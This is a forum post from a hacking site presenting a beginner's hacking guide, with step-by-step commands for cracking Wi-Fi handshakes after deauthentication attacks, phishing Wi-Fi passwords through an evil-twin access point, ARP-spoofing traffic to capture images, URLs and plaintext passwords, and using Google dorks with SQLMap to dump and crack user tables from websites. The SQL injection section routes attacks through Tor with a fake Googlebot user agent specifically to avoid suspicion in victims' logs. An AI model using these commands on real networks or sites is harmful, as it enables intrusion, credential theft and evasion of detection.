HackingVision: Beginner's Hacking Guide

This forum is for disusing for free online courses
Post Reply
User avatar
HackingVision
Gray hat hacker
Posts: 202
Joined: Tue Oct 02, 2018 9:42 pm
Location: United Kingdom

HackingVision: Beginner's Hacking Guide

Post by HackingVision » Fri Nov 02, 2018 6:26 pm

HackingVision: Beginner's Hacking Guide

1. Operating system
2. Installing Linux for the first time
3. Updating Kali Linux for the first time
4. Hacking first Wireless Network
5. Hack Wi-Fi Networks Without Cracking Wifiphisher
6. Port Scanning
7. MITM
8. Social Engineering
9. Metasploit
10. Google Dorks
11. SQL Injection
12. Password Cracking
13. Wordlists
14. Sites That Let You Hack Them
15. DOS / DDOS
16. RAT (Remote Access Tool)
17. XSS
18. Bluetooth Hacking
19. Hacking WPS Protected WiFi Routers
20. Bios Hacking Remove Bios Passwords Laptops
21. Blind SQL Injection
22. Open Ports
23. Hacking Android Smartphone
24. Hacking Social Media Accounts
25. Scan Web Servers For Vulnerabilities Using Nikto Kali Linux
26. Hacking TOR Hidden Services Kali Linux
27. How to Use Hacking Tools Without Opening Ports
28. Prevent Man-In-The-Middle Attacks, ARP-spoofing

We have had a lot of questions about getting into ethical hacking to help beginner's get into ethical hacking we have decided to share the basics with you here. (This thread will be edited regularly)

1. Operating system

There are many different Operating Systems on the market but what one is the best for hacking ? This is one of the most popular questions we are asked at HackingVision. Linux is an open source Operating System and is the best for hackers there are lots of open source tools and hacking scripts designed to run on Linux based Operating Systems. Linux has BASH Borne Again SHell this makes it easier for hackers to automate commands quickly and efficiently using a bash script.

One of the most popular variations of Linux aimed at pentesting is Kali Linux, Kali Linux comes with 1000's of hacking tools and scripts compiled and ready to use.

You can download Kali Linux from https://kali.org/downloads/

2. Installing Linux for the first time

There are a few ways of setting up a Linux Operating System.

Virtual Install: Linux is ran from a host Operating System using virtualisation software for example Windows 10 can run Kali Linux from a virtual environment using tools such as VirtualBox, VMWare.

Live-Boot: Linux can be booted in Live mode from removable media such as USB Stick, SDCard, External HDD, DVD this means that you can boot into Linux without making changes to your existing hard drive we always recommend beginners of using this method of booting Linux for the first time.

Full Install: Linux can be installed as your main Operating System if your using Kali Linux its not recommend to do a full install without creating a new user account this is because Kali Linux will start as a root user this can hold various security vulnerability if privileges are abused by a hacker.

Dual-Boot / Triple-Boot: Linux can be set up as dual boot, triple boot etc. along side Windows this is a popular way of installing Linux if you use Windows along side Linux or have more then one variation of Linux installed on your hard drive.

You can also install Kali Linux for Raspberry Pi.

Updating Kali Linux for the first time: So you have installed Kali Linux and now you get errors when your trying to install software ? don’t worry this is a common problem in Kali Linux. Today I will show you how to modify and update with Kali Linux official repositories.

Warning: unofficial repositories can hold a risks that could effect your system use official and trusted repositories only using third party repositories could compromise or brake your system in the process.

First of all we need to locate and open up our Sources.list file. This file stores our Repository sources.

You can find Sources.list file at the following location.

Code: Select all

/etc/apt/sources.list
Below is a list of current and prior Kali Linux Repositories choose what repository matches the version of your Kali Linux operating system.

I’m using Kali Linux 2018.4 so I will be using Kali Rolling repository. If you are using any version of Kali Linux from 2016 upwards you will need to use the Kali rolling repository.

Kali Rolling Repository

Code: Select all

deb http://http.kali.org/kali kali-rolling main contrib non-free
 # For source package access, uncomment the following line
 # deb-src http://http.kali.org/kali kali-rolling main contrib non-free
Kali sana (2.0) Repositories

Code: Select all

deb http://old.kali.org/kali sana main non-free contrib
 # For source package access, uncomment the following line
 # deb-src http://old.kali.org/kali sana main non-free contrib
Kali moto (1.0) Repositories

Code: Select all

deb http://old.kali.org/kali moto main non-free contrib
 # For source package access, uncomment the following line
 # deb-src http://old.kali.org/kali moto main non-free contrib
So now you know what sources you are working with open Sources.list using the following command.

Code: Select all

nano /etc/apt/sources.list
Now that we have Sources.list file open its time to add the new repositories.

Now remove all lines from this list of sources. (Sources.list should be blank at this stage.)

Copy the lines of the sources that correspond with your Kali Linux repositories version and paste then in to the Sources.list. Since I’m using Kali Linux 2018.4 I will use the following sources.

Code: Select all

deb http://http.kali.org/kali kali-rolling main contrib non-free
 # For source package access, uncomment the following line
 # deb-src http://http.kali.org/kali kali-rolling main contrib non-free
Once your happy with your source list save it using Ctrl+O in nano editor.

Now open up a terminal and use the command below to update the source list. This command will clean previous sources & update system source packages this will allow us to quickly and easily query Kali Linux repositories.

Code: Select all

apt-get clean && apt-get update
Once the system has finished updating packages you should be able to install packages using apt-get install successfully.

https://hackingvision.com/2017/05/13/fi ... ali-linux/

Configuring Wireless Interfaces: Once you have Kali Linux its time to configure our wireless interfaces and devices. Linux has a lot of drivers installed by default its not very often that you need to install a drivers for Linux.

To check if Linux has recognised our Wireless adaptor open up a new terminal and type command

Code: Select all

iwconfig
iwconfig is dedicated to wireless networking interfaces. It is used to set the parameters of the network interface such as wireless frequency and SSID.

Hacking first Wireless Network

There are many different types of wireless attacks in this guide we will be discussing how to hack wireless networks using social engineering methods and also brute force methods. We will list the tools we will be working with below.

Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works with any wireless network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic. Wikipedia

Cracking Wireless Router Using Aircrack-ng with crunch

First off this is tested on my own home network as i don’t advise hacking anyone else’s WiFi but your own.

First we need to put our wireless adaptor into monitor mode. Monitor mode: or RFMON mode, allows a computer with a wireless network interface controller to monitor all traffic received from the wireless network. Unlike promiscuous mode, which is also used for packet sniffing, monitor mode allows packets to be captured without having to associate with any access point or ad hoc network first.

Lets find out the name your card it will often be listed in Kali Linux as wlan0 or if using usb wifi like me you can use the ifconfig to find out.

Code: Select all

# ifconfig
Image

Now that we know the name of our wireless interface we need to put our wireless card into to monitor mode with airmon-ng start wlan1.

Code: Select all

# airmon-ng start wlan1
Image

Now the the wireless interface wlan1 will be put in to monitor mode. We can check if our wireless interface is in monitor mode by using ifconfig.

Code: Select all

# ifconfig
Image

As you see in the screen shot above we now have a wireless interface called wlan1mon this tells us that airmon-ng has successfully put out wireless card into monitor mode. Now we can use airodump-ng wlan1mon to find information about wifi signals such as BSSID and the wireless channel the target wireless network is running on.

Image

And the output.

Image

For this tutorial I’m using cablecomm-camget4. Once we have found a target wireless network we need to copy the bssid of the network. Open a new terminal and type airodump-ng –bssid the bssid of the network -c the channel of the network mines channel 1 –write the essid of the network CableComm-CamGet4. Essid is the target networks wireless interface name. Your command should look like this airodump-ng –bssid 00:23:BE:47:3C:93 -c1 –write CableComm-CamGet4 wlan1mon.

Code: Select all

# airodump-ng –bssid 00:23:BE:47:3C:93 -c1 –write CableComm-CamGet4 wlan1mon
Image

Image

Now its time to get the handshake this is the fun part. I’m going to show you two different ways to do this.

Frist one is.

aireplay-ng –deauth 10000 -a 00:23:BE:47:3C:93 wlan1mon for the main network

Code: Select all

# aireplay-ng –deauth 10000 -a 00:23:BE:47:3C:93 wlan1mon
Image

Second one is.

aireplay-ng –deauth 10000 -a 00:23:BE:47:3C:93 -c AC:22:0B:43:5B:D3 wlan1mon or use the -c for the client of the network

Code: Select all

# aireplay-ng –deauth 10000 -a 00:23:BE:47:3C:93 -c AC:22:0B:43:5B:D3 wlan1mon
Image

Or you can do what i do and run the two attacks a alongside each other.

Image

Now we need to wait for the handshake from the client.

Image

Now here comes the fun part mostly for those with small hard-drives that don’t have the space for word-lists. We can use the following command if we don’t have any word-lists.

Code: Select all

# crunch 4 20 abcdefghijklmnopqustuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | aircrack-ng CableComm-CamGet4-02.cap -e CableComm-CamGet4  -w-
Piping crunch with aircrack can save you time using word-lists.

Image

Now its time to open the cap file to crack the password. Let aircrack run and there ya go .. crunch can be piped with a number of tools like hashcat , john most the bruteforce tools on kali , parrot.

https://hackingvision.com/2018/08/21/ai ... th-crunch/

Hack Wi-Fi Networks Without Cracking Wifiphisher

In the last Wireless tutorial we talked a little about hacking WPA/WPA2 passwords using brute forcing methods in this tutorial Hack Wi-Fi Networks Without Cracking Wifiphisher. We will talk about hacking WPA/WPA2 networks without using brute force methods by creating a Evil Twin access point mimicking a Wireless access point we can easily trick clients into connecting to it and leak their credentials.

What is Wifiphisher

Wifiphisher is a wireless security tool that mounts automated victim customized phishing attacks against WiFi clients. This allows the attacker to obtain credentials or infect the target machine with malware. This method uses a social engineering attack method that can quickly trick the target into unknowingly handing over there password. Unlike other methods it does not include any brute forcing of any kind. It is an quick and easy way to obtaining credentials from captive portals and third party login pages (e.g. in social networks) or WPA/WPA2 pre-shared keys.

Wifiphisher works on Kali Linux and is licensed under the GPL license.

Scenario

Lets assume that we are testing security of our home network. We have turned off WPS and took all the precautions to safe guard our network against attackers. We have also changed the Password of the network AP to a strong password to prevent brute force attacks. Although there are others who use the same network from other devices who could potentially leak the Wireless password through human error this Wireless attack relies on a little deception and trickery.

Lets assume our network has 1 Access Point that is shared amongst 3 users we could use Wifiphisher to trick the clients into openly and unknowingly handing over their password. Using Social Engineering techniques Wifiphisher can easily create a Evil Twin access point we can trick the clients into reconnecting to the Evil Twin access point.

Installing Wifiphisher

To install Wifiphisher clone the script using git.

In a new terminal use these commands to download and install Wifiphisher.

Code: Select all

git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python setup.py install
After the script has finished unpacking and installing resources we can start Wifiphisher.

Code: Select all

python setup.py build && python setup.py install
Requirements

1x Wireless Interface that supports Managed mode.
1x Wireless INterface that supports Monitor mode.
Kali Linux or Linux Operating System
Wifiphisher

First of all do a scan of near by access points we will be looking for clients connected to the Network.

Start Wifiphisher using the following command.

Code: Select all

wifiphisher
Alternately use python bin/wifiphisher from Wifiphishers script location.

Code: Select all

python bin/wifiphisher
Specify Wireless Interfaces (Sometimes when starting Wifiphisher it will automatically select what network interfaces to use using the commands below we can specify what interfaces we want to use.)

Lets start first and up a new terminal and go to Wifiphishers download location using cd for example.

Code: Select all

cd wifiphisher
Now start wifiphisher replace wlan1, wlan2 with name of your Wireless interfaces.

Code: Select all

python bin/wifiphisher -aI wlan1 -jI wlan2
(-aI = ap interface -jI = Jamming interface)

Wifiphisher will now start scanning for wireless Networks. From the Network list choose the target wireless network using up and down keys when you have found the target network press Enter.

A list of phishing scenarios will appear I will use 10 “Firmware Uprade Page” this page will display a router configuration page without any logos or branding asking for WPA/WPA2 network password due to a firmware update.”)

After selecting what phishing scenario we want to use Wifiphisher will start an Evil Twin access point and spawn a lister. Any clients connected to the Wireless network will be de-authencatd by Wifiphisher and forced to connect to the Evil Twin access point.

After the client authenticates to the network any website that the target tries to browse to in the web browser will be diverted to a fake page prompting for credentials.

If you look at the section HTTP requests this shows what sites connected clients are looking for instead of loading the website the target client is looking for a fake phishing page created by Wifiphisher will appear.

GET = Sites clients are requesting.
POST = Post requests from connected clients. Requests with the tag POST will show POST requests that the target has sent over the network.

The POST request in the screen shot below shows credentials gathered by the web page attribute wfphshr-wpa-password. This POST request tells us that the target has entered the Wireless key “PRESH4REDK3Y”.

We have now successfully phished a Wireless network pass phrase using Wifiphisher. When we first installed Wifiphisher it will contain very limited phishing scenarios don’t worry we can add new phishing pages or even create our own Templates.

https://hackingvision.com/2017/05/17/ha ... fiphisher/

Port Scanning

MITM

Kali Linux Man in the Middle Attack Arpspoofing/Arppoisoning

In computer security, a man-in-the-middle attack (often abbreviated mitm, or the same using all capital letters) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other.

In this guide we will be working with a Linux distribution called Kali Linux as it comes with all the tools we need pre-installed.

We will be working with the following tools Aprsproof, Urlsnarf, Driftnet.

This tutorial will work on any Linux distribution if you don’t have any of the tools installed you can install them using the following command.

Code: Select all

# sudo apt-get install aprsproof && sudo apt-get install urlsnarf && sudo apt-get install driftnet
SCENARIO

Victim IP address: 192.168.43.53

Routers IP address: 192.168.43.1

Attackers Network Interface: 192.168.43.22

The first step is to configure our attacking machine to enable packet forwarding this will allow our attacking machine to mimic itself as the router. Tricking the victim machine into thinking it’s connecting to the router but really it will be connecting back to the attacking machine.

To start fire up your system and open a new terminal.

Code: Select all

# echo '1'> /proc/sys/net/ipv4/ip_forward
This will allow us to provide and forward traffic from attacking machine to the victim machine.

Now our ip forwarding setup we now need to setup aprsproof between the victim and the router.

To find our what your local ip address is you can use ifconfig where it says inet is your local ip address.

Image

Now we need to discover what hosts are live on the network to do this we will be using a tool called nmap.

Code: Select all

# nmap -sP 192.168.43.1/24
Image

To setup aprsproof between the victim and the router. Open up a command terminal and use the following commands Note: You will need to open up 2 separate terminals terminator is a great tool to allow you to use a split view.

Code: Select all

# arpspoof -i wlan0 -t <victimip> <routerip>
Now we need to set up arpspoof between the router and the victim.

Code: Select all

# arpspoof -i wlan0 -t <routerip> <victimip>
Image

Now we have the above steps complete all data sent or received by the victim machine should be getting forwarded to the attacking machine.

When the victim machine visits a website all of the image traffic will be forwarded to attacking machine. You can intercept these images using driftnet to start driftnet open up a new terminal and using the following command.

Code: Select all

# driftnet -i wlan0
Image

If you would like to see what websites the victim is visiting you can use urlsnarf.

Urlsnarf will record all websites visited by the victim and forward them back the attacker.

Code: Select all

# urlsnarf -i wlan0
Image

Now we will use dsniff it will allow us to grab passwords in plain text for protocols such as ftp, telnet, HTTP, SNMP, POP, LDAP, etc.

To use dniff open a new terminal up and use command dsniff.

Code: Select all

# dsniff
Image

If your using a Wireless Interface and want to grab traffic other then your own put your Wireless interface into Promiscuous Mode.

https://hackingvision.com/2017/02/18/ka ... le-attack/

Social Engineering
Metasploit

10. Google Dorks

What are Google Dorks ?

Google hacking, also named Google dorking is web search technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites and web applications use. Dorks are not only limited to Google Dorks, there are also Bing Dorks, Yahoo Dorks and so on however Google Dorks remain the most popular.

Google hacking uses advanced operators in the Google search engine to locate specific strings of text within search results. Google Dorks can be used for finding specific versions of vulnerable Web applications. It is normal for default installations of web applications and software to include their running version in pages they serve, for example, “Proudly Powered By WordPress”

11. SQL Injection

SQLMap Tutorial SQL Injection to hack a website and database in Kali Linux

I will demonstrate how an attacker would target and compromise a MySQL database. This will allow the attack to gain database information such as username as password and then compromise website running the database.

It is very important to keep SQL databases secure as they can often hold a lot of information about the website and its configuration. MySQL databases can also hold important client information and details.

What is an SQL Injection attack

SQL Injection is a type of cyber attack that allows the attacker to extract database information from a target websites SQL database.

What is SQLMap

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. SQLMap provides support to enumerate users, password hashes, privileges, roles, databases, tables and columns.

Downloading SQLMAP

http://sqlmap.org/

If you are using Kali Linux SQLMap comes pre-installed.

Finding a vulnerable website

We can find vulnerable website by using Google Dorks.

What is a Google dork ? A Google dork query, sometimes just referred to as a dork, is a search string that uses advanced search operators to find information that is not readily available on a website. Google dorking, also known as Google hacking, can return information that is difficult to locate through simple search queries.

SQLi Dork List
Google Dorks List

(Don’t relay on solely dorks. We are only using to demonstrate SQL Injection attacks in this tutorial)

Testing if a website is vulnerable

We can test if a website is vulnerable by adding a ‘ to the end of the url string.

For example:

Code: Select all

http://www.testwebsitesql.com/cgi-bin/item.cgi?item_id=15
Would become

Code: Select all

http://www.testwebsitesql.com/cgi-bin/item.cgi?item_id=15'
Image

Difference between standard SQL & Blind SQL

When an attacker exploits an SQL injection flaw, sometimes the web application displays error messages from the database complaining that the SQL Query’s syntax is incorrect. Blind SQL injection is almost identical to normal SQL Injection, the only difference being the way the data is retrieved from the database. Blind SQL will not display syntax errors as normal SQL injection would and can be a lot harder to find.

Lets start open up a new terminal and use the following command to execute sqlmap.

Code: Select all

# sqlmap
Image

Now we know SQLMap is working. We need to install Tor this will help keep our anonymity.

Tor (The Onion Router) aims to conceal its users’ identities and their online activity from surveillance and traffic analysis by separating identification and routing. It is an implementation of onion routing, which encrypts and then randomly bounces communications through a network of relays run by volunteers around the globe.

Open up a new terminal and use the following command to install Tor.

Code: Select all

# apt-get install tor
After Tor has installed you can execute it from a terminal using “tor”.

Image

Image

Image

When Tor has finished bootstrapping leave terminal running in the back ground and open up a new terminal.

Depending on our Network set up we may like to use SQLMap without Tor or using a VPN, SQLMap with Tor with a random user agent to add a little bit extra anonymity.

Below I have listed various methods you can use to list DBMS databases in SQLMap. if you don’t know what command is best for you use Listing DBMS Using Tor + Google User Agent with SQLMap for anonymity.

Listing DBMS databases SQLMap

Code: Select all

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs
What this command does:

Listing DBMS Using Tor with SQLMap for anonymity

Add these option to your sqlmap command to use tor along side SQLMap.

Code: Select all

--tor --tor-type=SOCKS5
What this command does is tells SQLMap to use our Tor Tunnel instead of our original network address.

For example:

Code: Select all

sqlmap -u http://target-website.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5
Listing DBMS Using Tor + Google User Agent with SQLMap for anonymity.

Code: Select all

sqlmap -u http://target-website.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
I will be using Tor and setting a Google Crawler as a user agent for additional obscurity. Google’s crawlers will often visit websites, and are one of the least suspicious entities in the website’s error logs.

We can use this to our advantage. by using the following command to mimic to be google bot.

Image

Image

SQLmap has now found the desired payload and indicates that that back-end DBMS is MySQL. Now that we know that the database we are targeting is MySQL we can skip testing for other DBMSes.

SQLMap will now test the MySQL database against injection attacks and fetch database information.

Image

Now we we can see what tables are available in the database its time to extract some information from it.

To list database tables we can use the following command.

Listing database tables in target MySQL Database

Code: Select all

sqlmap -u http://www.target-website.com/cgi-bin/item.cgi?item_id=15 -D databasetable --tables --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Replace option -D databasetable with the name of the database table you are targeting.

SQLmap with now fetch the desired data table from the MySQL database.

Image

Listing Database Columns

Code: Select all

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --column --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Listing from Target Columns

Code: Select all

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
We have now successfully listed the contents of the database we can then extract information from these tables by using the following command again.

Code: Select all

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Image

SQLMap will now prompt for a word list. In this tutorial I will be using the default word list so I will choose option (1) from the menu.

Image

SQLMap will then start cracking password hash’s from the SQL Database tables.

Image

Image

Lets say we have tried lots of word lists and we still can’t decrypt the hash. We can use a tool called findmyhash.

Find My Hash uses the internet to connect to various Databases around the net. To find if the hash you are trying to crack has already been decrypted by someone else in the past.

To use Find My Hash type findmyhash from a terminal.

Code: Select all

# findmyhash
Image

Image

There are also some great online tools for hash decryption such as CrackStation https://crackstation.net/

https://hackingvision.com/2017/04/14/sq ... ali-linux/

Password Cracking
Sites That Let You Hack Them

Post Reply